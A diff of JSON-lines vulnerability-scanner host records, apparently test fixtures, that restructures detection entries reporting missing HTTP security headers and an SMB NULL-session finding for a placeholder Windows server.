"2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596","COLOR":"#FFFFF","BACKGROUND_COLOR":"#FFFFF"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": [{"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","LAST_FIXED_DATETIME":"2023-05-22T02:09:49Z","FIRST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","LAST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","TIMES_REOPENED":"2","SERVICE":"service1","AFFECT_RUNNING_KERNEL":"kernel1","AFFECT_RUNNING_SERVICE":"service1","AFFECT_EXPLOITABLE_CONFIG":"config1","ASSET_CVE":"cve3","STATUS": "New","FQDN":"exchb10.exchb10.local","INSTANCE":"instance1","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}]}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": [{"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}]}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"IPV6":"0.0.0.0","OS_CPE":"xyz","EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "GOOGLE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}, "AZURE": {"ATTRIBUTE": [{"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}]}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": [{"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z"}]}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596","COLOR":"#FFFFF","BACKGROUND_COLOR":"#FFFFF"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","LAST_FIXED_DATETIME":"2023-05-22T02:09:49Z","FIRST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","LAST_REOPENED_DATETIME":"2023-05-22T02:09:49Z","TIMES_REOPENED":"2","SERVICE":"service1","AFFECT_RUNNING_KERNEL":"kernel1","AFFECT_RUNNING_SERVICE":"service1","AFFECT_EXPLOITABLE_CONFIG":"config1","ASSET_CVE":"cve3","STATUS": "New","FQDN":"exchb10.exchb10.local","INSTANCE":"instance1","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": {"TAG_ID": "19429855","NAME": "Linux"}},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} {"NETBIOS": "EXCHB10","IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031", "LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822", "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} -{"ASSET_ID":"27703780","DETECTION_LIST":{"DETECTION":{"FIRST_FOUND_DATETIME":"2023-05-30T11:49:24Z","IS_DISABLED":"0","LAST_FOUND_DATETIME":"2023-06-17T12:47:54Z","LAST_PROCESSED_DATETIME":"2023-06-17T13:20:12Z","QID":"70028","RESULTS":"User Name\t(none)\nDomain\t(none)\nAuthentication Scheme\tNULL session\nSecurity\tUser-based\nSMBv1 Signing\tDisabled\nDiscovery Method\tUnable to log in using credentials provided by user, fallback to NULL session\nCIFS Signing\tdefault","SEVERITY":"1","TIMES_FOUND":"38","TYPE":"Info"}},"DNS":"win-d24ck5nn676.ldap.local","DNS_DATA":{"DOMAIN":"ldap.local","FQDN":"win-d24ck5nn676.ldap.local","HOSTNAME":"win-d24ck5nn676"},"ID":"11701931","IP":"10.50.2.122","LAST_PC_SCANNED_DATE":"2023-06-18T04:00:17Z","LAST_SCAN_DATETIME":"2023-06-17T13:20:12Z","LAST_VM_SCANNED_DATE":"2023-06-17T12:47:54Z","LAST_VM_SCANNED_DURATION":"1806","NETBIOS":"WIN-D24CK5NN676","OS":"Windows 2016","TAGS":{"TAG":{"NAME":"Windows","TAG_ID":"19429857"}},"TRACKING_METHOD":"IP"} -{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"GOOGLE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"AZURE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": {"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z"}}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"DETECTION": [{"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\n\n\n\nHTTP/1.1 200 OK\nContent-Type: text/html\nLast-Modified: Fri, 29 Mar 2019 10:51:17 GMT\nAccept-Ranges: bytes\nETag: "135e2b561de6d41:0"\nServer: Microsoft-IIS/10.0\nX-Powered-By: ASP.NET\nDate: Tue, 30 May 2023 05:56:00 GMT\nConnection: keep-alive\nContent-Length: 703\n\nStrict-Transport-Security HTTP Header missing on port 443.","LAST_TEST_DATETIME": "2023-05-30T07:46:15Z"}]}, "OS": "Windows Server 2016 Standard Evaluation 64 bit Edition AD Version 1607","TRACKING_METHOD": "IP","LAST_VM_AUTH_SCANNED_DATE": "2023-05-31T12:34:44Z"} +{"ASSET_ID":"27703780","DETECTION_LIST":{"FIRST_FOUND_DATETIME":"2023-05-30T11:49:24Z","IS_DISABLED":"0","LAST_FOUND_DATETIME":"2023-06-17T12:47:54Z","LAST_PROCESSED_DATETIME":"2023-06-17T13:20:12Z","QID":"70028","RESULTS":"User Name\t(none)\nDomain\t(none)\nAuthentication Scheme\tNULL session\nSecurity\tUser-based\nSMBv1 Signing\tDisabled\nDiscovery Method\tUnable to log in using credentials provided by user, fallback to NULL session\nCIFS Signing\tdefault","SEVERITY":"1","TIMES_FOUND":"38","TYPE":"Info"},"DNS":"win-d24ck5nn676.ldap.local","DNS_DATA":{"DOMAIN":"ldap.local","FQDN":"win-d24ck5nn676.ldap.local","HOSTNAME":"win-d24ck5nn676"},"ID":"11701931","IP":"10.50.2.122","LAST_PC_SCANNED_DATE":"2023-06-18T04:00:17Z","LAST_SCAN_DATETIME":"2023-06-17T13:20:12Z","LAST_VM_SCANNED_DATE":"2023-06-17T12:47:54Z","LAST_VM_SCANNED_DURATION":"1806","NETBIOS":"WIN-D24CK5NN676","OS":"Windows 2016","TAGS":{"TAG":{"NAME":"Windows","TAG_ID":"19429857"}},"TRACKING_METHOD":"IP"} +{"NETBIOS": "EXCHB10","NETWORK_ID": 0,"EC2_INSTANCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_RESOURCE_ID": "i-07f91cxxx3axxxb3f","CLOUD_SERVICE": "EC2","CLOUD_PROVIDER": "AWS","QG_HOSTID": "44e2cf13-xxxx-48b9-xxxx-de489547754d","METADATA": {"EC2": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"GOOGLE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}},"AZURE": {"ATTRIBUTE": {"NAME": "firstDiscovered","LAST_STATUS": "Success","VALUE": "1683517315000","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z","LAST_ERROR_DATE": "2023-05-22T02:09:49Z","LAST_ERROR": "404 - Not Found"}}},"CLOUD_PROVIDER_TAGS": {"CLOUD_TAG": {"NAME": "Name","VALUE": "allocator-dnt-frozen-i3en-2xl-v1-a","LAST_SUCCESS_DATE": "2023-06-22T12:44:21Z"}}, "IP": "81.2.69.192","ID": "11700976","LAST_PC_SCANNED_DATE": "2023-05-31T11:30:20Z","ASSET_ID": "27858031","TAGS": {"TAG": [{"NAME": "Sales","TAG_ID": "19427596"},{"TAG_ID": "19429855","NAME": "Linux"}]},"LAST_VM_SCANNED_DATE": "2023-05-31T12:34:44Z","LAST_VM_SCANNED_DURATION": "1822","DNS": "abc10.fdgshb10.local","DNS_DATA": {"DOMAIN": "abc10.local","FQDN": "abc10.fdgshb10.local","HOSTNAME": "abc10"},"LAST_SCAN_DATETIME": "2023-05-31T12:55:28Z","LAST_VM_AUTH_SCANNED_DURATION": "1822","DETECTION_LIST": {"LAST_UPDATE_DATETIME": "2023-05-30T07:48:14Z","STATUS": "New","FIRST_FOUND_DATETIME": "2023-05-30T07:46:15Z","QID": "11827","SSL": "0","IS_IGNORED": "0","PORT": "443","SEVERITY": "2","LAST_FOUND_DATETIME": "2023-05-30T07:46:15Z","TYPE": "Confirmed","QDS": {"#text": "50","severity": "MEDIUM"},"QDS_FACTORS": {"QDS_FACTOR": [{"#text": "Easy_Exploit,No_Patch","name": "RTI"},{"#text": "5.0","name": "CVSS"}]},"LAST_PROCESSED_DATETIME": "2023-05-30T07:48:14Z","PROTOCOL": "tcp","TIMES_FOUND": "1","IS_DISABLED": "1","RESULTS": "X-Content-Type-Options HTTP Header missing on port 443.\n\nGET / HTTP/1.0\nHost: 81.2.69.192\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 